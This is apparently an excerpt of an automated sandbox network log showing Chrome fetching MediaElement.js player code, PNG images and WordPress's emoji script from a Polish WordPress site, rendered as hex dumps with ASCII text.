                                                            2025-01-15 10:08:05 UTC8000INData Raw: 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 3c 31 30 7c 7c 32 30 3c 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 29 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 33 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 33 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 30 3f 76 6f 69 64 20 30 3a 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 25 31 30 30 3d 3d 31 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f
                                                            Data Ascii: ngth<=0?void 0:arguments[0])%100<10||20<=(arguments.length<=0?void 0:arguments[0])%100)?arguments.length<=2?void 0:arguments[2]:arguments.length<=3?void 0:arguments[3]},function(){return(arguments.length<=0?void 0:arguments[0])%100==1?arguments.length<=2?
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 65 72 2e 72 65 6e 64 65 72 65 72 73 5b 64 5d 3b 76 61 72 20 75 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 72 2e 6f 70 74 69 6f 6e 73 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 6f 70 74 69 6f 6e 73 29 3b 72 65 74 75 72 6e 28 69 3d 72 2e 63 72 65 61 74 65 28 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2c 75 2c 74 29 29 2e 6e 61 6d 65 3d 65 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 73 5b 72 2e 6e 61 6d 65 5d 3d 69 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 3d 69 2c 6e 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 72 65 6e 64 65 72 65 72 4e 61 6d 65 3d 65 2c 69 2e 73 68 6f 77 28 29 2c 21 30 7d 7d 72 65 74 75 72 6e 21 31 7d 2c 66 2e 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 73 65 74 53 69 7a 65 3d 66 75
                                                            Data Ascii: er.renderers[d];var u=Object.assign(r.options,n.mediaElement.options);return(i=r.create(n.mediaElement,u,t)).name=e,n.mediaElement.renderers[r.name]=i,n.mediaElement.renderer=i,n.mediaElement.rendererName=e,i.show(),!0}}return!1},f.mediaElement.setSize=fu
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 6f 6e 28 65 29 7b 7b 69 66 28 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3d 7b 7d 3b 69 66 28 6e 75 6c 6c 21 3d 65 29 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6e 29 26 26 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 3d 65 2c 74 7d 7d 28 65 28 32 35 29 29 2c 68 3d 65 28 32 37 29 2c 76 3d 65 28 32 36 29 2c 67 3d 65 28 32 38 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2e 63 6f 6e 66 69 67 2c 7b 75
                                                            Data Ascii: on(e){{if(e&&e.__esModule)return e;var t={};if(null!=e)for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n]);return t.default=e,t}}(e(25)),h=e(27),v=e(26),g=e(28);function a(e){return e&&e.__esModule?e:{default:e}}Object.assign(o.config,{u
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 69 74 6c 65 22 2c 61 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 61 29 29 7d 29 7d 7d 29 7d 2c 7b 31 36 3a 31 36 2c 32 3a 32 2c 32 36 3a 32 36 2c 32 37 3a 32 37 2c 35 3a 35 7d 5d 2c 31 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 70 3d 72 28 65 28 32 29 29 2c 6f 3d 65 28 31 36 29 2c 69 3d 72 28 6f 29 2c 6d 3d 72 28 65 28 35 29 29 2c 79 3d 65 28 32 35 29 2c 45 3d 65 28 33 30 29 2c 62 3d 65 28 32 36 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2e 63 6f 6e 66 69 67 2c 7b 65 6e 61 62 6c 65 50 72
                                                            Data Ascii: itle",a),d.setAttribute("aria-label",a))})}})},{16:16,2:2,26:26,27:27,5:5}],11:[function(e,t,n){"use strict";var p=r(e(2)),o=e(16),i=r(o),m=r(e(5)),y=e(25),E=e(30),b=e(26);function r(e){return e&&e.__esModule?e:{default:e}}Object.assign(o.config,{enablePr
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 69 76 65 7c 7c 67 2e 67 65 74 44 75 72 61 74 69 6f 6e 28 29 3d 3d 3d 31 2f 30 29 7b 69 66 28 21 72 26 26 67 2e 6f 70 74 69 6f 6e 73 2e 66 6f 72 63 65 4c 69 76 65 29 7b 76 61 72 20 61 3d 70 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 67 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 62 72 6f 61 64 63 61 73 74 22 2c 61 2e 69 6e 6e 65 72 54 65 78 74 3d 6d 2e 64 65 66 61 75 6c 74 2e 74 28 22 6d 65 6a 73 2e 6c 69 76 65 2d 62 72 6f 61 64 63 61 73 74 22 29 2c 67 2e 73 6c 69 64 65 72 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 2c 67 2e 72 61 69 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 65 6c 73 65 20 72 26 26 28 67 2e 73 6c 69 64
                                                            Data Ascii: ive||g.getDuration()===1/0){if(!r&&g.options.forceLive){var a=p.default.createElement("span");a.className=g.options.classPrefix+"broadcast",a.innerText=m.default.t("mejs.live-broadcast"),g.slider.style.display="none",g.rail.appendChild(a)}}else r&&(g.slid
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 22 64 69 76 22 29 2c 6f 2e 63 61 70 74 69 6f 6e 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 63 61 70 74 69 6f 6e 73 2d 6c 61 79 65 72 20 22 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 6c 61 79 65 72 22 2c 6f 2e 63 61 70 74 69 6f 6e 73 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 27 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 22 63 61 70 74 69 6f 6e 73 2d 70 6f 73 69 74 69 6f 6e 20 22 2b 69 2e 6f 70 74 69 6f 6e 73 2e 63 6c 61 73 73 50 72 65 66 69 78 2b 27 63 61 70 74 69 6f 6e 73 2d 70 6f 73 69 74 69 6f 6e 2d 68 6f 76 65 72 22 27 2b 72 2b 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 27 2b 69 2e 6f 70 74 69 6f 6e 73 2e
                                                            Data Ascii: "div"),o.captions.className=i.options.classPrefix+"captions-layer "+i.options.classPrefix+"layer",o.captions.innerHTML='<div class="'+i.options.classPrefix+"captions-position "+i.options.classPrefix+'captions-position-hover"'+r+'><span class="'+i.options.
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 73 74 61 72 74 4c 61 6e 67 75 61 67 65 3d 3d 3d 6e 29 7b 6f 2e 63 68 65 63 6b 65 64 3d 21 30 3b 76 61 72 20 6c 3d 28 30 2c 6a 2e 63 72 65 61 74 65 45 76 65 6e 74 29 28 22 63 6c 69 63 6b 22 2c 6f 29 3b 6f 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6c 29 7d 7d 7d 2c 72 65 6d 6f 76 65 54 72 61 63 6b 42 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 4c 2e 64 65 66 61 75 6c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 22 2b 65 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 3b 6e 26 26 6e 2e 72 65 6d 6f 76 65 28 29 7d 7d 2c 61 64 64 54 72 61 63 6b 42 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6f 3d 74 68 69 73 3b 22 22 3d 3d
                                                            Data Ascii: .options.startLanguage===n){o.checked=!0;var l=(0,j.createEvent)("click",o);o.dispatchEvent(l)}}},removeTrackButton:function(e){var t=L.default.getElementById(""+e);if(t){var n=t.closest("li");n&&n.remove()}},addTrackButton:function(e,t,n){var o=this;""==
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 67 6e 28 69 2e 64 65 66 61 75 6c 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 62 75 69 6c 64 76 6f 6c 75 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 69 66 28 21 50 2e 49 53 5f 41 4e 44 52 4f 49 44 26 26 21 50 2e 49 53 5f 49 4f 53 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 68 69 64 65 56 6f 6c 75 6d 65 4f 6e 54 6f 75 63 68 44 65 76 69 63 65 73 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 73 3d 61 2e 69 73 56 69 64 65 6f 3f 61 2e 6f 70 74 69 6f 6e 73 2e 76 69 64 65 6f 56 6f 6c 75 6d 65 3a 61 2e 6f 70 74 69 6f 6e 73 2e 61 75 64 69 6f 56 6f 6c 75 6d 65 2c 72 3d 28 30 2c 54 2e 69 73 53 74 72 69 6e 67 29 28 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 54 65 78 74 29 3f 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 54 65 78 74 3a 77 2e 64 65 66 61 75 6c 74
                                                            Data Ascii: gn(i.default.prototype,{buildvolume:function(e,t,n,o){if(!P.IS_ANDROID&&!P.IS_IOS||!this.options.hideVolumeOnTouchDevices){var a=this,s=a.isVideo?a.options.videoVolume:a.options.audioVolume,r=(0,T.isString)(a.options.muteText)?a.options.muteText:w.default
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 6d 65 20 53 6c 69 64 65 72 22 2c 22 6d 65 6a 73 2e 74 69 6d 65 2d 68 65 6c 70 2d 74 65 78 74 22 3a 22 55 73 65 20 4c 65 66 74 2f 52 69 67 68 74 20 41 72 72 6f 77 20 6b 65 79 73 20 74 6f 20 61 64 76 61 6e 63 65 20 6f 6e 65 20 73 65 63 6f 6e 64 2c 20 55 70 2f 44 6f 77 6e 20 61 72 72 6f 77 73 20 74 6f 20 61 64 76 61 6e 63 65 20 74 65 6e 20 73 65 63 6f 6e 64 73 2e 22 2c 22 6d 65 6a 73 2e 6c 69 76 65 2d 62 72 6f 61 64 63 61 73 74 22 3a 22 4c 69 76 65 20 42 72 6f 61 64 63 61 73 74 22 2c 22 6d 65 6a 73 2e 76 6f 6c 75 6d 65 2d 68 65 6c 70 2d 74 65 78 74 22 3a 22 55 73 65 20 55 70 2f 44 6f 77 6e 20 41 72 72 6f 77 20 6b 65 79 73 20 74 6f 20 69 6e 63 72 65 61 73 65 20 6f 72 20 64 65 63 72 65 61 73 65 20 76 6f 6c 75 6d 65 2e 22 2c 22 6d 65 6a 73 2e 75 6e 6d 75 74 65
                                                            Data Ascii: me Slider","mejs.time-help-text":"Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.","mejs.live-broadcast":"Live Broadcast","mejs.volume-help-text":"Use Up/Down Arrow keys to increase or decrease volume.","mejs.unmute


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            105192.168.2.1649823178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC647OUTGET /wp-content/uploads/2015/07/disney_cars.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:05 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:05 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:24 GMT
                                                            ETag: "6616-620a8b50c61b9"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 26134
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:05 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 3a 02 a0 89 07 0e 00 00 20 00 49 44 41 54 78 da ec bd 79 94 5c f5 75 ef fb f9 fd ce 54 73 f5 dc d5 73 b7 5a 52 4b 42 b3 04 42 20 b0 8d c1 80 c1 36 1e e2 18 df d8 89 ed 75 b3 e2 f5 f2 e2 f7 f2 1c 67 f9 26 b9 b9 c9 ba 4e 56 56 de b5 6f 86 e7 eb 24 be 36 9e c0 80 31 b6 09 02 64 06 23 24 24 81 0c 12 42 63 6b ec 56 0f ea b1 ba e6 aa 73 ce ef f7 fe a8 ea 46 92 01 63 26 83 73 3e 5a b5 a4 6e 9d ae 3a bd eb fc be b5 f7 fe ed bd 0f 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME: IDATxy\uTssZRKBB 6ug&NVVo$61d#$$BckVsFc&s>Zn:
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 34 46 1c b4 e5 10 73 34 61 e1 e1 ab 0a b1 e6 7a a4 94 98 18 c8 72 91 d3 fb 9f 61 66 74 84 cd eb d7 b3 24 d5 8a 08 07 42 15 08 d6 5b 4d ae ce 73 ef 25 02 3c 8f bb bf 7d 1b 07 0e 3e cf 8d 1f 78 3f 1d 89 18 66 28 c2 fa b5 eb 78 e4 b1 c7 68 94 9a f6 96 16 c2 96 c5 d4 d9 71 c6 4f 9e e1 f0 ec 0c 7e 31 8f f0 35 42 43 c9 ad 30 93 c9 91 c9 65 99 1a 1b 43 2b 4d 34 16 a3 e2 bb 9c 9b 9c 64 36 9d a6 58 2a e3 96 2b 78 b5 7c 55 b9 54 5a 38 15 79 51 18 62 00 76 ed cd b6 a8 e6 58 ec da bf e7 77 16 25 10 43 a0 d0 d8 e7 7d cf a8 fd 6d 9d f7 f5 f9 3d 8f 02 10 f9 7c f5 71 de 31 e7 cf 8f 12 80 ae 09 a0 c2 ad e6 75 32 d9 0b fe 7f fe 35 ce 5f cf f3 25 10 f3 e5 13 b9 da b1 7e 2d f4 9e 7f 54 78 61 a7 54 03 e5 da 43 01 a6 6d 62 87 23 08 43 22 a5 81 15 0e 11 8a 44 b0 43 d5 7c 9c 63
                                                            Data Ascii: 4Fs4azraft$B[Ms%<}>x?f(xhqO~15BC0eC+M4d6X*+x|UTZ8yQbvXw%C}m=|q1u25_%~-TxaTCmb#C"DC|c
                                                            2025-01-15 10:08:05 UTC8000INData Raw: 59 55 23 ef 80 e5 05 a1 a9 a8 9e fa 67 f9 5d 48 25 92 78 02 61 34 c3 8f 2f 18 c5 1b 8c a1 85 12 f8 13 29 da d6 ac 22 d9 95 64 6a 66 94 bf f9 cf ff 0f 13 93 93 44 63 71 ca d5 1a 43 d7 ae a1 28 0a 5b 36 6f a2 a9 29 8e 2e 0b 46 25 b0 be 92 83 ad 6a f4 af ed e7 b1 c7 1e c3 71 e1 cc 99 b3 4c cf 67 f8 f9 93 cf 90 ab b8 ec d8 b5 93 78 53 0c 5f 7b 27 fd 7d dd ac aa 56 f0 1a 7e e6 e7 16 18 b9 32 4c 76 66 9e c9 b1 eb cc 4e 4f 32 37 bf c0 fc 62 96 5c 3e 87 5b c8 e3 59 9c 23 ea 56 eb e1 17 10 03 02 8a 82 57 55 eb cb d6 df f8 71 eb eb 0e 1a aa 82 b0 ec 4f 75 e1 74 d1 15 15 55 34 d6 57 74 eb c5 a5 0e f5 6e 06 ae cb ef 9d 94 68 00 cc ad d7 d4 db 02 6c f1 49 bf 17 5c 1c 1c ea 2d 68 dc c6 8f e2 d4 17 89 fd 74 d7 50 cb ad bb 39 cd b4 50 85 da d8 8e ba 6c d7 c1 72 eb 61 ab
                                                            Data Ascii: YU#g]H%xa4/)"djfDcqC([6o).F%jqLgxS_{'}V~2LvfNO27b\>[Y#VWUqOutU4WtnhlI\-htP9Plra
                                                            2025-01-15 10:08:05 UTC2199INData Raw: 00 8f c7 83 a6 69 28 8a 22 db 04 7f 85 41 75 23 04 ac d5 6a 14 8b 45 46 46 46 b8 78 f1 a2 ed 38 ce 2f 1f 7f fc f1 a7 9a 9b 9b 8f 29 8a 32 2b 84 b0 e5 88 49 60 fd d1 a1 e5 ba 6e 2c 93 c9 6c 7d eb ad b7 0e 8f 8c 8c fc fb fe fe fe 50 77 77 37 b1 58 0c bf df 8f ae eb a8 aa 8a aa aa 12 5c 5f 31 47 f5 e9 10 30 93 c9 30 3c 3c cc c5 8b 17 f3 5d 5d 5d 3f de b7 6f df 6f 63 b1 d8 29 21 44 46 c2 4a 02 eb 41 3a 78 05 10 2a 16 8b eb ce 9e 3d fb c8 9b 6f be f9 af 13 89 c4 fa ee ee 6e b5 ab ab 8b 50 28 84 cf e7 43 d3 b4 4f 1c d7 a7 5d 97 84 d8 83 0f a7 4f bb a9 1b 8e ca b2 2c 2a 95 0a f9 7c 9e 91 91 11 86 87 87 ed b9 b9 b9 8f f6 ef df ff f3 81 81 81 a3 81 40 e0 63 20 2f 84 90 b9 01 09 ac 07 f2 c0 f6 99 a6 d9 39 31 31 b1 ed 83 0f 3e d8 73 e5 ca 95 ef a7 d3 e9 74 2a 95 52
                                                            Data Ascii: i("Au#jEFFFx8/)2+I`n,l}Pww7X\_1G00<<]]]?ooc)!DFJA:x*=onP(CO]O,*|@c /911>st*R


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            106192.168.2.1649825178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC403OUTGET /wp-content/uploads/2015/07/Disney3.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC256INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:19 GMT
                                                            ETag: "1ad4-620a8b4c5663a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 6868
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC6868INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 50 00 00 00 fe 08 06 00 00 00 f5 6b 3b f2 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                            Data Ascii: PNGIHDRPk;pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            107192.168.2.1649824178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC411OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=5.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:50 GMT
                                                            ETag: "4705-620a92ca06b2f"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 18181
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:06 UTC7906INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 66 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 74 77 65 6d 6f 6a 69 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 76 2f 31 33 2e 31 2e 30 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 64 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70
                                                            Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/13.1.0/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typ
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 38 66 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 39 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 36 62 2d 5c 75 64 63 36 64 5c 75 64 63 38 66 5c 75 64 63 39 31 5d 29 7c 28 3f 3a 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 28 3f 3a 5c 75 32 36 39 35 5c 75 66 65 30 66 7c 5c 75 32 36 39 36 5c 75 66 65 30 66 7c 5c 75 32 37 30 38 5c 75 66 65 30 66 7c 5c 75 64 38 33 63 5b 5c 75 64 66 33 65 5c 75 64 66 37 33 5c 75 64 66 37
                                                            Data Ascii: c[\udffb-\udfff]|\ud83d\udc8f\ud83c[\udffb-\udfff]|\ud83d\udc91\ud83c[\udffb-\udfff]|\ud83d[\udc6b-\udc6d\udc8f\udc91])|(?:\ud83d[\udc68\udc69]|\ud83e\uddd1)(?:\ud83c[\udffb-\udfff])?\u200d(?:\u2695\ufe0f|\u2696\ufe0f|\u2708\ufe0f|\ud83c[\udf3e\udf73\udf7
                                                            2025-01-15 10:08:06 UTC2275INData Raw: 2e 6c 65 6e 67 74 68 29 26 26 31 3d 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 33 3d 3d 3d 65 5b 30 5d 2e 6e 6f 64 65 54 79 70 65 26 26 22 49 4d 47 22 3d 3d 3d 74 5b 30 5d 2e 6e 6f 64 65 4e 61 6d 65 26 26 65 5b 30 5d 2e 64 61 74 61 3d 3d 3d 74 5b 30 5d 2e 61 6c 74 26 26 22 6c 6f 61 64 2d 66 61 69 6c 65 64 22 3d 3d 3d 74 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 72 72 6f 72 22 29 29 72 65 74 75 72 6e 3b 66 6f 72 28 3b 6e 2d 2d 3b 29 7b 69 66 28 33 3d 3d 3d 28 61 3d 65 5b 6e 5d 29 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 21 61 2e 70 61 72 65 6e 74 4e 6f 64 65 29 63 6f 6e 74 69 6e 75 65 3b 69 66 28 6f 29 66 6f 72 28 3b 61 2e 6e 65 78 74 53 69 62 6c 69 6e 67 26 26 33 3d 3d 3d 61 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2e 6e 6f 64 65 54 79
                                                            Data Ascii: .length)&&1===t.length&&3===e[0].nodeType&&"IMG"===t[0].nodeName&&e[0].data===t[0].alt&&"load-failed"===t[0].getAttribute("data-error"))return;for(;n--;){if(3===(a=e[n]).nodeType){if(!a.parentNode)continue;if(o)for(;a.nextSibling&&3===a.nextSibling.nodeTy


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
